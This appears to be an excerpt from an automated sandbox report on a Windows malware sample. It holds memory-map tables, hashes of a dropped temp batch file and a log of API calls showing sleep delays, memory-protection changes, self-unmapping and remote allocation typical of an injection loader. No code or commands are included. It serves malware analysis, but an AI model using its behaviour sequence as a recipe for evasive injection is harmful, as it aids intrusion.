| private_0x0000000000440000 | 0x00440000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00777fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001d10000 | 0x01d10000 | 0x01ebffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d10000 | 0x01d10000 | 0x01e2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d10000 | 0x01d10000 | 0x01d4ffff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x01d50000 | 0x01d8bfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000001df0000 | 0x01df0000 | 0x01e2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01ebffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ec0000 | 0x01ec0000 | 0x022bffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x022c0000 | 0x0258efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002590000 | 0x02590000 | 0x0270ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002590000 | 0x02590000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002590000 | 0x02590000 | 0x0268ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000026a0000 | 0x026a0000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000026d0000 | 0x026d0000 | 0x0270ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002710000 | 0x02710000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002710000 | 0x02710000 | 0x0288ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002710000 | 0x02710000 | 0x027dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002850000 | 0x02850000 | 0x0288ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002900000 | 0x02900000 | 0x02cf2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02d00000 | 0x0362ffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003630000 | 0x03630000 | 0x0b62ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| msvbvm60.dll | 0x72940000 | 0x72a92fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwmapi.dll | 0x74130000 | 0x74142fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x741b0000 | 0x7422ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sxs.dll | 0x74e30000 | 0x74e8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dhcpcsvc.dll | 0x74fd0000 | 0x74fe1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75630000 | 0x7566afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75670000 | 0x75685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x75690000 | 0x75697fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x756b0000 | 0x756cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x756e0000 | 0x756e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x75ad0000 | 0x75ad4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75ae0000 | 0x75c3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x75c40000 | 0x75e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75f20000 | 0x76014fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x761b0000 | 0x7623efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76240000 | 0x7635cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76360000 | 0x7636bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76370000 | 0x763c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76690000 | 0x767c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x767f0000 | 0x767f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76a70000 | 0x776b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x777e0000 | 0x77814fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat | 0.21 KB (216 bytes) |
MD5:
98de219891ef24cceaa12d1c41436654
SHA1: 7ad5ad583dfd70ed21dd2acef592c931def67f0a SHA256: 14facf8fc3da422ce17a7695d1261c86078c97436ea643bc4d153aeda0904a88 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x759d5235 |
|
1 | |
| Mutex | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Module | Get Filename | module_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x762170a1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x761c3dcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x761c07b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x761e1ca9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x761c8e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x761c7684 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x761ccc98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x761f903a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x761c6231 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x761c5fea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x761d3f94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x761d4e9e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x761fdb72 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x761e2a8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x761fd737 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x761fe015 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x761fd1c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x761fd48c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x761fd4c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x761fd509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x761ce7bb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x761ce496 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x761fd53f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76202055 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x762020ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76202151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x762021f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76202288 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76202335 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x762023d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x761d5934 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x761d5a98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x761d59b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7622e405 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7622ef07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7622f00a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7622ef47 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7622f15e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7622dbd4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7622ecfa |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7622ea66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7622d332 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7622ee2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7622ca11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7622cc5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7622cde7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7622c802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7622ec66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7622d155 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x761cb0dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x761e5f3e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x761d4fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x761d0d2c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x761e59ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x761bf8b8 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75b29d4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75af0782 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 260 |
|
2 | |
| Module | Load | module_name = SXS.DLL, base_address = 0x74e30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74e77685 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x758d7d2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x758e3150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x758fe7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x758e5281 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x758e451a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x758e4413 |
|
1 | |
| Window | Create | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| Window | Create | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = VBMsoStdCompMgr, index = 0, new_long = 40706204 |
|
1 | |
| Window | Create | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Window | Create | window_name = Langskallet7, wndproc_parameter = 0 |
|
1 | |
| Module | Load | module_name = KERNEL32 , base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x759ecfcc |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a50efd |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76cb8af2 |
|
1 | |
| Module | Load | module_name = NTDLL, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x77ccfb18 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x758e0a19 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x77ccff2c |
|
1 | |
| System | Sleep | duration = 15 milliseconds (0.015 seconds) |
|
32 | |
| System | Sleep | duration = 8000 milliseconds (8.000 seconds) |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77cd0028 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x759d53c6 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a545bf |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a5437f |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x759ed802 |
|
1 | |
| Module | Load | module_name = IPHlpApi, base_address = 0x756b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x756b9263 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76cb7078 |
|
1 | |
| Module | Load | module_name = User32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x758dd1cf |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x758e3961 |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
